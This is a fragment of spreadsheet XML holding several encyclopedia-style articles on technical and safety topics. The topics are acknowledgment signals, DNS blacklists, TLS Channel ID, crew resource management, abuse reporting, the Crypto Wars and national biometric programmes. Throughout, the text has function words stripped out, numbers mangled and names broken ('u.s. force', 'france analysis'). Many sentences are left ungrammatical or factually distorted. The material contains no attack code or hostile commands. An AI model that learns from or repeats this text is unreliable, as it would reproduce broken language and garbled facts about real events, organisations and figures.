    <t>data networking, telecommunications, computer buses, acknowledgment (ack) signal passed communicating processes, computers, devices signify acknowledgment, receipt message, part communications protocol. negative-acknowledgement (nak nack) signal sent reject previously received message indicate kind error. acknowledgments negative acknowledgments inform sender receiver's state adjust state accordingly. many protocols contain checksums verify integrity payload header. checksums used detect data corruption. message received invalid checksum (that data received would different checksum message had), receiver know information corrupted. most often, checksums employed, corrupted message received either served signal, served signal. acknowledgment characters ascii code includes character (00001102 616) transmitted indicate successful receipt character (00101012 1516) transmitted indicate inability failure receive. unicode provides visible symbols characters, u+2406 u+2415 (␕). protocol usage many protocols acknowledgement-based, meaning positively acknowledge receipt messages. internet's transmission control protocol (tcp) example acknowledgement-based protocol. when computers communicate tcp, received packets acknowledged sending back packet set. protocol allows acknowledgements included data sent opposite direction. some protocols send single acknowledgement packet information. other protocols zmodem allow many packets transmitted receiving acknowledgement them, procedure necessary fill high bandwidth-delay product links large number bytes flight. other protocols nak-based, meaning respond messages problem. examples include reliable multicast protocols send receiver detects missing packets. still protocols make naks acks. binary synchronous communications (bisync) adaptive link rate (for energy-efficient ethernet) examples. still protocols rc-5, user datagram protocol (udp), protocols perform blind transmission acknowledgement, often transmitting message multiple times hopes least copy message gets through. acknowledgement function used automatic repeat request (arq) function. acknowledgement frames numbered coordination frames received sent transmitter. this allows transmitter avoid overflow underrun receiver, become aware missed frames. binary synchronous communications, used indicate transmission error detected previously received block receiver ready accept retransmission block. bisync single character control sequences alternate even/odd block acknowledgement. hardware acknowledgment some computer buses dedicated acknowledge wire control used acknowledge operations: dack used dma; datack used stebus, data transfer acknowledge motorola 68000 inspired title dtack grounded, etc. some computer buses always acknowledge every write; writes posted write. serial time slot acknowledgment byte. also control codes flow control (data) nack-oriented reliable multicast references external links peter rukavina. "ack nak". retrieved 2020-03-04.</t>
  </si>
  <si>
    <t>Comparison of DNS blacklists</t>
  </si>
  <si>
    <t>following table lists technical information assumed reputable blacklists used blocking spam. notes "collateral listings"—deliberately listing non-offending addresses, order coerce isps take action spammers control. "notifies upon listing"—warns registrants listed addresses domains registrants take actions problems). suspect providers suspect providers employ well-documented patterns questionable reckless practices questionable actors based statements communications rbl's principal management official forums. these practices usually include acceptance de-listing payments (also known ransom payments) incentivizes fraud case uceprotect/whitelisted.org. often, providers circular rhetoric "only spammers would claim illegitimate" furtherance scheme. these providers shown clear lengthy patterns misconduct unstable behavior public forums operations both. recommended isps carefully consider providers incorporating spam blocking regimens. these providers demonstrated potential willingness adversely affect vast swaths internet communications misguided, reckless likely fraudulent purposes. using providers likely result clogging support channels negatively affecting legitimate business customers. references external links list rbls, information existing blacklists including discontinued blacklists.</t>
  </si>
  <si>
    <t>Transport Layer Security Channel ID</t>
  </si>
  <si>
    <t>transport layer security channel (tls channel previously known transport layer security origin bound certificates tls-obc) draft proposal transport layer security (tls) extension aims increase security using certificates ends connection. notably, client permitted dynamically create local, self-signed certificate provides additional security. also protect users related domain cookie attack. token binding token binding evolution channel feature, ietf draft microsoft google authors. references external links channel ietf draft tls-obc system administrators</t>
  </si>
  <si>
    <t>Crew resource management</t>
  </si>
  <si>
    <t>crew resource management cockpit resource management (crm) training procedures environments human error devastating effects. primarily used improving aviation safety focuses interpersonal communication, leadership, decision making aircraft cockpits. founder david beaty, former royal force boac pilot wrote "the human factor aircraft accidents" (1969). despite considerable development electronic aids since then, many principles developed continue prove effective. formally began national transportation safety board (ntsb) recommendation written ntsb safety investigator aviation psychologist alan diehl investigation 1978 united airlines flight crash. issues surrounding crash included dc-8 crew running fuel portland, oregon, troubleshooting landing gear problem.the term "cockpit resource management"—which later generalized "crew resource management"—was coined 1979 nasa psychologist john lauber, several years studied communication processes cockpits. while retaining command hierarchy, concept intended foster less-authoritarian cockpit culture co-pilots encouraged question captains observed making mistakes.crm grew 1977 tenerife airport disaster, boeing aircraft collided runway, killing people. weeks later, nasa held workshop topic, endorsing training. united airlines first airline launch comprehensive program, starting 1981. 1990s, become global standard.united airlines trained flight attendants conjunction pilots provide another layer enhanced communication teamwork. studies shown work groups reduces communication barriers problems solved efficiently, leading increased safety. training concepts modified wide range activities including traffic control, ship handling, firefighting, medical operating room, people must make dangerous, time-critical decisions. overview current generic term "crew resource management" (crm) widely adopted also known cockpit resource management; flightdeck resource management; command, leadership resource management. when techniques applied arenas, sometimes given unique labels, maintenance resource management, bridge resource management, maritime resource management. training encompasses wide range knowledge, skills, attitudes including communications, situational awareness, problem solving, decision making, teamwork; together attendant sub-disciplines areas entails. defined system uses resources promote safety within workplace. concerned cognitive interpersonal skills needed manage resources within organized system rather technical knowledge skills required operate equipment. context, cognitive skills defined mental processes used gaining maintaining situational awareness, solving problems making decisions. interpersonal skills regarded communications range behavioral activities associated teamwork. many operational systems, skill areas often overlap, confined multi-crew craft equipment, relate single operator equipment craft. aviation organizations including major airlines military aviation introduced training crews. training mandated requirement commercial pilots working regulatory bodies, including (us) easa (europe). notechs system used evaluate non-technical skills. following lead commercial airline industry, department defense began training crews 1980s. u.s. force u.s. navy require crew members receive annual training reduce human-error-caused mishaps. u.s. army version called aircrew coordination training enhanced (act-e). case studies united airlines flight when crew united airlines flight making approach portland international airport evening 1978, experienced landing gear abnormality. captain decided enter holding pattern could troubleshoot problem. captain focused landing gear problem hour, ignoring repeated hints first officer flight engineer dwindling fuel supply, realized situation engines began flaming out. aircraft crash-landed suburb portland, oregon, miles short runway. people aboard, crew members eight passengers died. ntsb safety investigator alan diehl wrote report: issue operations bulletin carrier operations inspectors directing urge assigned operators ensure flightcrews indoctrinated principles flightdeck resource management, particular emphasis merits participative management captains assertiveness training cockpit crewmembers. (class priority action) (x-79-17) diehl assigned investigate accident realized similar several major airline accidents including crash eastern lines flight runway collision boeing-747s tenerife. united airlines flight captain haynes, pilot united airlines flight 232, credits factors saved life, many others, sioux city, iowa, crash july 1989: preparation paid crew something called cockpit resource management 1980, kind worked concept captain authority aircraft. what said, goes. lost airplanes that. sometimes captain smart thought was. would listen him, said, know he's talking about. years flying experience cockpit, trying airplane ground, minute actually practiced [under failure conditions], would know getting airplane ground conditions three. used [crm], everybody input cinch made france analysis blames failure follow proper procedures contributing factor 2009 fatal crash atlantic ocean france flight janeiro paris. final report concluded aircraft crashed temporary inconsistencies airspeed measurements—likely aircraft's pitot tubes obstructed crystals—caused autopilot disconnect, crew reacted incorrectly, causing aircraft enter aerodynamic stall recover.following recovery black years later, independent analyses published official report issued bea, france's safety board. french report book "erreurs pilotage" written jean-pierre otelli, leaked final minutes recorded cockpit conversation. according popular mechanics, examined cockpit conversation crash: utterly failing engage important process known crew resource management, crm. they failing, essentially, cooperate. clear either responsible what, what. first flight 6560 canadian transportation safety board (ctsb) determined failure crew resource management largely responsible crash first flight 6560, boeing 737-200, resolute, nunavut, august 2011. malfunctioning compass gave crew incorrect heading, although instrument landing system global positioning system indicated course. first officer made several attempts indicate problem captain failure follow airline procedures lack standardized communication protocol indicate problem captain dismissing first officer's warnings. both pilots also overburdened making preparations land, resulting neither able full attention happening. first increased time dedicated training result accident, ctsb recommended regulatory bodies airlines standardize procedures training canada. qantas flight success qantas flight flight attributed teamwork skills. susan parson, editor federal aviation administration (faa) safety briefing wrote; "clearly, qf32 crew's performance bravura example professionalism airmanship every aviation citizen aspire emulate".carey edwards, author airmanship wrote: their crew performance, communications, leadership, teamwork, workload management, situation awareness, problem solving decision making resulted injuries passengers crew. qf32 remain finest examples airmanship history aviation. adoption fields transportation basic concepts ideology proven successful related fields. 1990s, several commercial aviation firms international aviation safety agencies began expanding traffic control, aircraft design, aircraft maintenance. aircraft maintenance section training expansion gained traction maintenance resource management (mrm). attempt standardize industry-wide training, issued advisory circular 120–72, maintenance resource management training september 2000. following study aviation mishaps 1992 2002, united states force determined close aircraft mishaps directly attributable human error maintenance, often occurred long flight problems discovered. these "latent errors" include failures follow published aircraft manuals, lack assertive communication among maintenance technicians, poor supervision, improper assembly practices. 2005, address human-error-induced aircraft mishaps, doug slocum, chief safety national guard's (ang) 162nd fighter wing, tucson, directed modification base's program military version called maintenance resource management (mrm).in mid-2005, national guard's aviation safety division converted slocum's program national program available national guard's flying wings u.s. states territories. 2006, defense safety oversight council (dsoc) u.s. department defense (dod) recognized mishap-prevention value maintenance safety program partially funding variant training throughout u.s. force. this initiated, dod-funded version became known force maintenance resource management (af-mrm) widely used u.s. force.the rail safety regulators panel australia adapted rail rail resource management developed free resources. operating train crews national railroad passenger corporation (amtrak) united states instructed principles yearly training courses.crm adopted merchant shipping worldwide. stcw convention stcw code, 2017 edition, published i.m.o. states requirements bridge resource management engine room resource management training. these approved shore-based training, simulator training, approved in-service experience. most maritime colleges hold courses deck engine room officers. refresher courses held every five years. these referred maritime resource management. firefighting following successful aviation training, identified potential safety improvement program fire services. putnam wrote paper applied concepts violent deaths wildland firefighters south canyon fire colorado.from paper, movement initiated wildland structural fire services apply concepts emergency response situations. various programs since developed train emergency responders concepts help track breakdowns stressful environments.the international association fire chiefs published first manual fire service 2001. currently third edition. several industry-specific textbooks also published. healthcare elements applied healthcare since late 1990s, specifically infection prevention. example, "central line bundle" best practices recommends using checklist inserting central venous catheter. observer checking checklist usually lower-ranking person inserting catheter. observer encouraged communicate elements bundle executed; example breach sterility occurred. teamstepps agency healthcare research quality (ahrq), division united states department health human services, also provides training based principles healthcare teams. this training, called team strategies tools enhance performance patient safety (teamstepps), program currently implemented hospitals, long-term care facilities, primary care clinics around world. teamstepps designed improve patient safety teaching healthcare providers better collaborate using tools huddles, debriefs, handoffs, check-backs. implementing teamstepps shown improve patient safety. there evidence teamstepps interventions difficult implement universally effective. there strategies healthcare leaders improve chance implementation success, using coaching, supporting, empowering, supporting behaviors. also british european airways flight helmet fire impact culture aviation safety line-oriented flight training saudia flight single pilot resource management sterile cockpit rule checklist manifesto primarily justification application ideas safety medical operating rooms. maritime resource management threat error management references external links military human factors archived 2008, wayback machine crew resource management current regulatory paper crew resource management fire service teamstepps program u.s. dept. health human services flight-crew human factors handbook (cap 737)</t>
  </si>
  <si>
    <t>Abuse Reporting Format</t>
  </si>
  <si>
    <t>abuse reporting format (arf) also known messaging abuse reporting format (marf) standard format reporting spam email. history draft describing standard format feedback loop (fbl) reports posted yakov shafranovich april 2005 evolved current 5965. aol, pioneered field 2003, initially used different format, converted facto standard 2008. feedback loops arf, january 2010, ietf chartered working group working towards goal standardizing format. called messaging abuse reporting format marf, produced 5965. 2012 extended 6591 6692 define failure reports, reporting email authentication failures. 2015, latter report type extended 7489 define dmarc's failure reports. purpose format designed extensible, providing generic spam reporting, e.g. users anti-spam center help desk, opt-out operations. format defines mime type included multipart/report attachment, includes least headers offending message. although draft description acknowledges operators choose modify redact portion privacy legal reasons, recommends entire original email message attached, including unmodified recipient address. arf-encapsulated report comes subject offending message. much like bounce messages, abuse report consists human readable part, followed machine readable part, original message. machine readable part's type message/feedback-report, whose definition core draft. extensibility achieved including feedback-type field characterizes report. possible values field are: abuse spam kind email abuse; fraud indicates kind fraud phishing activity; virus report virus found originating message; feedback types; not-spam used report email message mistakenly marked spam. iana registry provided feedback-type, well field names. each field name either relevant type feedback, specified type only. some fields appear multiple times. example, source-ip field, containing address original message received, appear type report, once; removal-recipient field, indicating email addresses removed, appear opt-out reports, times. addition, dkim-failure subtype, iana registry. example report email abuse follows. (note first three lines machine readable part required.) also feedback loop (email) references</t>
  </si>
  <si>
    <t>Crypto Wars</t>
  </si>
  <si>
    <t>crypto wars unofficial name attempts united states (us) allied governments limit public's foreign nations' access cryptography strong enough thwart decryption national intelligence agencies, especially national security agency (nsa). export cryptography united states cold early days cold war, u.s. allies developed elaborate series export control regulations designed prevent wide range western technology falling hands others, particularly eastern bloc. export technology classed 'critical' required license. cocom organized coordinate western export controls. types technology protected: technology associated weapons ("munitions") dual technology, also commercial applications. u.s., dual technology export controlled department commerce, munitions controlled state department. since immediate post wwii period market cryptography almost entirely military, encryption technology (techniques well equipment and, computers became important, crypto software) included category xiii item united states munitions list. multinational control export cryptography western side cold divide done mechanisms cocom. 1960s, however, financial organizations beginning require strong commercial encryption rapidly growing field wired money transfer. u.s. government's introduction data encryption standard 1975 meant commercial uses high quality encryption would become common, serious problems export control began arise. generally dealt case-by-case export license request proceedings brought computer manufacturers, ibm, large corporate customers. encryption export controls became matter public concern introduction personal computer. phil zimmermann's cryptosystem distribution internet 1991 first major 'individual level' challenge controls export cryptography. growth electronic commerce 1990s created additional pressure reduced restrictions. shortly afterward, netscape's technology widely adopted method protecting credit card transactions using public cryptography. ssl-encrypted messages used cipher, used 128-bit keys. u.s. government export regulations would permit crypto systems using 128-bit keys exported. stage western governments had, practice, split personality came encryption; policy made military cryptanalysts, solely concerned preventing 'enemies' acquiring secrets, policy communicated commerce officials whose support industry. longest size allowed export without individual license proceedings bits, netscape developed versions browser. "u.s. edition" full 128-bit strength. "international edition" effective length reduced bits revealing bits protocol. acquiring 'u.s. domestic' version turned sufficient hassle computer users, even u.s., ended 'international' version, whose weak 40-bit encryption could broken matter days using single personal computer. similar situation occurred lotus notes reasons.legal challenges peter junger civil libertarians privacy advocates, widespread availability encryption software outside u.s., perception many companies adverse publicity weak encryption limiting sales growth e-commerce, series relaxations export controls, culminating 1996 president bill clinton signing executive order 13026 transferring commercial encryption munition list commerce control list. furthermore, order stated that, "the software shall considered treated 'technology'" sense export administration regulations. this order permitted united states department commerce implement rules greatly simplified export proprietary open source software containing cryptography, 2000. current status 2009, non-military cryptography exports u.s. controlled department commerce's bureau industry security. some restrictions still exist, even mass market products, particularly regard export "rogue states" terrorist organizations. militarized encryption equipment, tempest-approved electronics, custom cryptographic software, even cryptographic consulting services still require export license (pp. 6–7). furthermore, encryption registration required export "mass market encryption commodities, software components encryption exceeding bits" 36494). addition, items require one-time review notification prior export countries. instance, must notified open-source cryptographic software made publicly available internet, though review required. export regulations relaxed pre-1996 standards, still complex. other countries, notably participating wassenaar arrangement, similar restrictions. export cryptography until 1996, government withheld export licenses exporters unless used weak ciphers short keys, generally discouraged practical public cryptography. debate cryptography brought open. mobile phone signals clipper chip clipper chip chipset mobile phones made 1990s, implemented encryption backdoor government. government tried phone manufacturers adopt chipset, without success, program finally defunct 1996. a5/1 (gsm encryption) a5/1 stream cipher used provide over-the-air communication privacy cellular telephone standard. security researcher ross anderson reported 1994 "there terrific nato signal intelligence agencies mid-1980s whether encryption strong not. germans said shared long border warsaw pact; countries feel way, algorithm fielded french design."according professor arild audestad, standardization process started 1982, a5/1 originally proposed length bits. time, bits projected secure least years. estimated bits would fact also still secure 2014. audestad, peter arend, thomas haug british insisted weaker encryption, haug saying told british delegate allow british secret service eavesdrop easily. british proposed length bits, west germans wanted stronger encryption protect east german spying, compromise became length bits. general, length {\displaystyle 2^{128-56}=2^{72}=4.7\times 10^{21}} times easier break length 128. challenges widely used encryption algorithm originally planned size bits; lobbied size bits. compromise size bits, parity bits, make effective security parameter bits. considered insecure early 1977, documents leaked 2013 snowden leak shows fact easily crackable nsa, still recommended nist. challenges series brute force attack contests created security highlight lack security provided data encryption standard. part successful cracking des-encoded messages, constructed specialized cracking computer nicknamed deep crack. successful cracking likely helped gather political technical support advanced encryption hands ordinary citizens. 1997, nist began competition select replacement des, resulting publication 2000 advanced encryption standard (aes). still considered secure 2019, considers strong enough protect information classified secret level. snowden nsa's bullrun program fearing widespread adoption encryption, stealthily influence weaken encryption standards obtain master keys—either agreement, force law, computer network exploitation (hacking).according york times: "but 2006, n.s.a. document notes, agency broken communications three foreign airlines, travel reservation system, foreign government's nuclear department another's internet service cracking virtual private networks protected them. 2010, edgehill program, british counterencryption effort, unscrambling traffic targets goal additional 300."as part bullrun, also actively working "insert vulnerabilities commercial encryption systems, systems, networks, endpoint communications devices used targets". york times reported random number generator dual_ec_drbg contains back door nsa, would allow break encryption relying random number generator. even though dual_ec_drbg known insecure slow random number generator soon standard published, potential backdoor found 2007, alternative random number generators without flaws certified widely available, security continued using dual_ec_drbg company's bsafe toolkit data protection manager september 2013. while security denied knowingly inserting backdoor bsafe, given explanation continued usage dual_ec_drbg flaws became apparent 2006 2007, however reported december 2013 accepted payment million random number generator default. leaked documents state effort challenge finesse" "eventually, n.s.a. became sole editor" standard. 2010, developed "groundbreaking capabilities" encrypted internet traffic. gchq document warned however "these capabilities among sigint community's fragile, inadvertent disclosure simple 'fact could alert adversary result immediate loss capability." another internal document stated "there 'need know.'" several experts, including bruce schneier christopher soghoian, speculated successful attack rc4, 1987 encryption algorithm still used least cent ssl/tls traffic plausible avenue, given several publicly known weaknesses rc4. others speculated gained ability crack 1024-bit diffie–hellman public keys. team researchers pointed wide reuse non-ephemeral 1024 primes diffie–hellman implementations, done precomputation primes order break encryption using real time plausibly nsa's "groundbreaking capabilities" refer to.the bullrun program controversial, believed deliberately inserts keeps secret vulnerabilities affect law-abiding citizens well nsa's targets, nobus policy. theory, jobs: prevent vulnerabilities affect find vulnerabilities used targets; argued bruce schneier, seems prioritize finding even creating) keeping vulnerabilities secret. bruce schneier called broken group charged strengthening cryptography subservient groups want break cryptography targets. encryption smartphone storage part snowden leaks, became widely known intelligence agencies could bypass encryption data stored android smartphones legally ordering google apple bypass encryption specific phones. around 2014, reaction this, google apple redesigned encryption technical ability bypass could unlocked knowing user's password.various enforcements officials, including obama administration's attorney general eric holder responded strong condemnation, calling unacceptable state could access alleged criminals' data even warrant. iconic responses, chief detectives chicago's police department stated "apple become phone choice pedophile". washington post posted editorial insisting "smartphone users must accept cannot valid search warrant", agreeing backdoors would undesirable, suggested implementing "golden key" backdoor would unlock data warrant.fbi director james comey cited number cases support need decrypt smartphones. interestingly, none presumably carefully handpicked cases smartphone anything identification capture culprits, seems unable find strong cases supporting need smartphone decryption.bruce schneier labelled right smartphone encryption debate crypto wars cory doctorow called crypto wars redux.legislators states california york proposed bills outlaw sale smartphones unbreakable encryption. february 2016, bills passed. february 2016 obtained court order demanding apple create electronically sign software would enable unlock iphone recovered shooters 2015 terrorist attack bernardino, california. apple challenged order. hired third party crack phone. fbi–apple encryption dispute. april 2016, dianne feinstein richard burr sponsored bill, described "overly vague" some, would likely criminalise forms strong encryption.in december 2019, united states senate committee judiciary convened hearing encryption lawful access, focusing encrypted smartphone storage. district attorney cyrus vance jr., professor matt tait, erik neuenschwander apple, sullivan facebook testified. chairman lindsey graham stated opening remarks "all want devices protect privacy." also said enforcement able read encrypted data devices, threatening pass legislation necessary: "you're going find we're going you." end-to-end-encrypted messaging services october 2017, deputy attorney general rosenstein called escrow euphemism "responsible encryption" solution ongoing problem "going dark". this refers wiretapping court orders police measures becoming ineffective strong end-to-end encryption increasingly added widespread messenger products. rosenstein suggested escrow would provide customers recover encrypted data forget password, lost forever. from enforcement perspective, would allow judge issue search warrant instructing company decrypt data; without escrow undermining encryption impossible service provider comply request. contrast previous proposals, decentralized storage keys companies instead government agencies claimed additional safeguard. front doors 2015 head nsa, admiral michael rogers, suggested decentralizing escrow introducing "front doors" instead back doors encryption. this way, would split halves: kept government authorities company responsible encryption product. government would thus still need search warrant obtain company's half-key, company would unable abuse escrow access users' data without government's half-key. experts impressed. lightweight encryption 2018, promoted "lightweight encryption", particular ciphers simon speck, internet things devices. however, attempt ciphers standardized failed severe criticism raised board cryptography experts provoked fears non-public knowledge break them. 2015 call outlawing non-backdoored cryptography following 2015 charlie hebdo shooting, terrorism attack, former prime minister david cameron called outlawing non-backdoored cryptography, saying "means communication" cannot read". president barack obama sided cameron this. this call action seem resulted legislation changes status non-backdoored cryptography legal available. 2020 earn eliminating abusive rampant neglect interactive technologies (earn 2020 provides 19-member national commission develop "best practice" guidelines technology providers conform order "earn" immunity (traditionally provided 'automatically' section communications decency act) liability child sexual abuse material platforms. proponents present tackle child sexual abuse material internet platforms, criticized advocates encryption likely "best practices" devised commission include refraining using end-to-end encryption, encryption would make impossible screen illegal content. also restrictions import cryptography communications assistance enforcement human rights encryption 40-bit encryption references</t>
  </si>
  <si>
    <t>Crypto naming controversy</t>
  </si>
  <si>
    <t>meaning word crypto abbreviation controversial. cryptographers people specialize cryptography used term "crypto" abbreviation field study. however, "crypto" also become common abbreviation cryptocurrency. etymologies definitions word cryptography derives prefix "crypto-" greek origin meaning "hidden" suffix "-graph" also greek origin meaning write". this name reflects cryptography's historical role study codes secret communication. still, prefix crypto appears many words, cryptofascism (secret support fascism), cryptosporidium parasite), cryptomnesia long-forgotten memory).the term "cryptography" nowadays refers effervescent area research moved beyond secret ciphers study message authentication, digital signatures, secure multiparty computation zero-knowledge proofs, among active areas research. cryptocurrencies, hand, currencies cryptography underlying mechanism. nevertheless, cryptocurrencies digital signatures hash functions. usages dictionaries merriam-webster oxford english dictionary, define "crypto" shorthand cryptography. crypto wars series governmental efforts slow adoption cryptography.matt blaze registered domain crypto.com 1993, sold domain 2018 cryptocurrency company. 2021, staples center angeles renamed crypto.com arena, referring cryptocurrency company behind domain.descriptivism, opposed prescriptivism, school thought accepts crypto referring cryptocurrency rather cryptography based common term. statements computer scientist matthew green stated cryptocurrencies barely anything serious cryptography, aside trivial digital signatures hash functions. matt blaze stated 2018 think calling cryptocurrencies ‘crypto’ poor choice, consequences cryptography cryptocurrencies".parker higgins freedom press foundation stated cryptography crowd nature deeply invested precision.journalist lorenzo franceschi-bicchierai vice compared controversy meaning word "hacker", used criminals curious technology enthausiast part hacker culture.the website cryptoisnotcryptocurrency.com features statement "‘crypto’ mean cryptocurrency, means cryptography." background emoticon expressing incredulity.amie stepanovich, executive director silicon flatirons center university colorado, created t-shirts bearing message: "crypto. means cryptography." this shirt popular among cybersecurity experts; was, example, worn matt blaze. also crypto wars references external links cryptoisnotcryptocurrency.com</t>
  </si>
  <si>
    <t>Countries applying biometrics</t>
  </si>
  <si>
    <t>biometrics refers automated recognition individuals based biological behavioral characteristics, confused statistical biometrics; used analyse data biological sciences. biometrics purposes identification involve matching, facial recognition, fingerprints, retina iris scanning, voice analysis, handwriting, gait, even body odor.there multiple countries applying biometrics multiple reasons, voting epassports. however, list partial. multiple countries asia africa, including china (prc), collect fingerprints biometrics foreign visitors. austria austria stores biometric photographs holders cards passports, austrian citizens, store collected fingerprints cases. also stores photographs driver licenses health insurance cards issued foreign citizens. foreign citizens subject visa residency regimes, photographs fingerprints stored. storage photographs citizens violation regulation 2019/1157, states, days issuing card, biometric information discarded. australia visitors intending visit australia returning australian residents epassport submit biometric authentication part smartgate system, linking individuals visas passports. biometric data collected visa applicants immigration particularly cases refugee humanitarian visas.australia first country introduce biometrics privacy code, established administered biometrics institute. biometrics institute privacy code forms part australian privacy legislation. code includes privacy standards least equivalent australian national privacy principles (npps) privacy also incorporates higher standards privacy protection relation certain acts practices. only members biometrics institute eligible subscribe code. biometrics institute membership, thus subscription code, voluntary. brazil since beginning 20th century, brazilian citizens user cards. decision brazilian government adopt fingerprint-based biometrics spearheaded felix pacheco janeiro, time capital federative republic. pacheco friend juan vucetich, invented complete tenprint classification systems existence. vucetich system adopted brazil, also south american countries. oldest traditional institute brazil (instituto identificação félix pacheco) integrated detran (brazilian equivalent dmv) civil criminal afis system 1999. each state brazil allowed print card, layout data them. cards printed janeiro fully digitized using code information matched owner off-line. code encodes color photo, signature, fingerprints, citizen data. this technology developed 2000 order enhance safety brazilian cards.by 2005, brazilian government started development passport. documents started released beginning 2007, brasília. passport included several security features, like laser perforation, hidden symbols, security layer variable data etc. brazilian citizens signature, photo, rolled-fingerprints collected passport requests. data planned stored icao e-passport standard. this allows contactless electronic reading passport content citizens verification since fingerprint templates token facial images available automatic recognition. canada canada begun research biometric technology area border security immigration (center security sciences), public security technical program, biometrics community practice). least program, nexus program operated jointly canada border services agency u.s. customs border protection, already operational. functioning example biometric technology, specifically "iris recognition biometric technology" used border control security travellers. canada also home world's biggest biometric access control company called bioscrypt inc. china china started using biometric collection since november 2018 foreign citizens part visa application process. pilot scheme tested shenzhen international airport prior country-wide implementation. data collected fingers hand voiceprint. these measures likely intended clamp visa loopholes improve foreign surveillance. france france introduced biometric border control system known parafe august 2007 schengen borders. system allows enrolled utilise automated "airlock" barriers cross border. french passports issued june 2009 pre-enrolled, european union, european economic area, swiss passport holders family member european union citizens enroll charles gaulle airport (terminals paris orly airports. barriers currently orly, charles gaulle, marseille airports eurostar services london paris gambia gambian biometric identification system (gambis) allowed issuance gambia's first biometric identity documents july 2009. individual's data, including biometric information (thumbprints) captured database. national identification number (nin), unique applicant applying card, issued applicant. biometric documents issued gambia include national identity cards, residential permits, non-gambian cards driver licenses. germany biometrics market germany experienced enormous growth years 2005 2009. "the market size increase approximately million (2004) million (2009). "the federal government major contributor development". particular, biometric procedures fingerprint facial recognition profit government project. 2005 german upper house parliament approved implementation epass, passport issued german citizens contain biometric technology. epass circulation since november 2005, contains chip holds digital photograph fingerprint hand, usually index fingers, though others used fingers missing extremely distorted prints. third biometric identifier iris scans could added later stage". increase prevalence biometric technology germany effort keep citizens safe within german borders also comply current deadline visa-waiver countries introduce biometric passports. addition producing biometric passports german citizens, german government place requirements visitors apply visas within country. "only applicants long-term visas, allow three months' residence, affected planned biometric registration program. work visas also include fingerprinting, iris scanning, digital photos".germany also first countries implement biometric technology olympic games protect german athletes. "the olympic games always diplomatically tense affair previous events rocked terrorist attacks—most notably germany last held games munich 1972 israeli athletes killed".biometric technology first used olympic summer games athens, greece 2004. registering scheme, accredited visitors receive card containing fingerprint biometrics data enable access 'german house'. accredited visitors include athletes, coaching staff, team management members media".as protest increasing biometric data, influential hacker group chaos computer club published fingerprint german minister interior wolfgang schäuble march 2008 edition magazine datenschleuder. magazine also included fingerprint film readers could fool fingerprint readers. croatia india government india funds number social welfare schemes focused towards poor vulnerable sections society. aadhaar platform offers opportunity streamline welfare delivery mechanisms improve transparency good governance. recent supreme court india verdict aadhaar mandatorily linked permanent account number (tax identification number india) service agencies uidai issues aadhaar number residents de-duplicating demographic biometric attributes entire database. aadhaar authentication enables elimination duplicates various schemes expected generate substantial savings government exchequer. also provides government accurate data beneficiaries, enables direct benefit programs, allows government departments/service providers coordinate optimize various schemes. aadhaar enable implementing agencies verify beneficiaries ensure targeted delivery benefits. activities lead curbing leakages targeted delivery: welfare programs beneficiaries required confirmed service delivery, stand benefit uidai’s authentication services. this result curbing leakages ensuring services delivered intended beneficiaries only. examples include subsidized food kerosene delivery public distribution system (pds) beneficiaries, worksite attendance mahatma gandhi national rural employment guarantee scheme (mgnregs) beneficiaries, etc. improving efficiency efficacy: with aadhaar platform providing accurate transparent information service delivery mechanism, government improve disbursement systems utilize scarce development funds effectively efficiently including better human resource utilisation involved service delivery network. residents aadhaar system provides single-source online identity verification across country residents. once residents enrol, aadhaar number authenticate establish identity multiple times using electronic means. eliminates hassle repeatedly providing supporting identity documents time resident wishes access services opening bank account, obtaining driving license, etc. providing portable proof identity verified aadhaar authentication on-line anytime, anywhere, aadhaar system enables mobility millions people migrate part country another. about uidai unique identification authority india (uidai) statutory authority established provisions aadhaar (targeted delivery financial subsidies, benefits services) act, 2016 (aadhaar 2016) july 2016 government india, ministry electronics information technology (meity). prior establishment statutory authority, uidai functioning attached office planning commission (now niti aayog) vied gazette notification no.-a-43011/02/2009-admn.i dated january 2009. later, september 2015, government revised allocation business rules attach uidai department electronics information technology (deity) ministry communications information technology. uidai created objective issue unique identification numbers (uid), named "aadhaar", residents india robust enough eliminate duplicate fake identities, verified authenticated easy, cost-effective way. first number issued september 2010 resident nandurbar, maharashtra. authority issued crore (&gt;1.31 billion) aadhaar numbers residents india. under aadhaar 2016, uidai responsible aadhaar enrollment authentication, including operation management stages aadhaar life cycle, developing policy, procedure system issuing aadhaar numbers individuals perform authentication also required ensure security identity information authentication records individuals. iraq biometrics used extensively iraq catalogue many iraqis possible providing iraqis verifiable identification card, immune forgery. during account creation, collected biometrics information logged central database allows user profile created. even iraqi lost card, identification found verified using unique biometric information. additional information also added account record, individual personal history. israel 2009, knesset (israeli parliament) passed biometric database law, sanctioning issue biometric cards passports israeli citizens establishment mandatory database storing bodily information (fingerprints face templates). 2013, israel launched two-year preliminary pilot study evaluate assess project’s feasibility necessity, participation voluntary. march 2017, several postponements resulting political controversies technical challenges, israel’s minister interior ratified project.opponents proposed law, including prominent israeli scientists security experts, warned existence database could damage civil liberties state security, leaks could used criminals hostile individuals israeli residents. italy since 2013, italy deployed number epassport gates major italian airports allowing swiss citizens biometric passport cross schengen border totally automated way. italy standardized protocols police forces. nepal nepal already started issuing national identity cards e-passports biometrics. korea, south korean national required submit rotational fingerprints national police criminal database regardless previous criminal record, photo right thumb rotational fingerprint ministry interior safety. this process held korean applies mandatory national card, resident registration card, right thumb rotational fingerprint printed back resident registration card, allowing private companies utilize fingerprint. fingerprints saved criminal database cannot opt-out deleted even one's emigration death. koreans must submit fingerprints every time trying enter korea unless traditional immigration checkpoints, scanned fingerprints compared fingerprints stored criminal database. korean passports hold biometrics data, since citizens' biometrics data stored criminal database.non-korean nationals required submit flat fingerprints photo. fingerprints stored permanently deleted even one's departure korea. privacy issues regarding biometrics not-well known korea, fingerprints collected citizen minor, police inform fingerprints processed, saved, used citizens. netherlands starting september 2009, dutch passports cards must include holder's fingerprints. since august 2006, dutch passports included electronic chip containing personal details holder digitised passport photograph. chip holds following data: name (first name(s) surname); document number; nationality, date birth sex; expiry date; country issue; personal number (dutch social security (sofi) number). recent requirements passport photographs since august 2006, regulation '2252/2004' member states obliged include digital image holder's passport photograph. zealand smartgate launched zealand government auckland international airport thursday december 2009. program available auckland, wellington christchurch international airports arriving travellers, also travellers departing auckland (with plans extend program departures wellington christchurch mid-2011).the kiosk gate system allow zealand australian electronic passport holders clear passport control without needing identity checked customs officer. system uses "advanced facial software" "compares face digital copy photo epassport chip".deputy comptroller customs john secker said smartgate represented probably biggest single development border processing zealand past decades. people choice whether want system normal passport control. norway introduction biometric passports norway began 2005 supplied setec, gemplus international company. chips used norway employ security 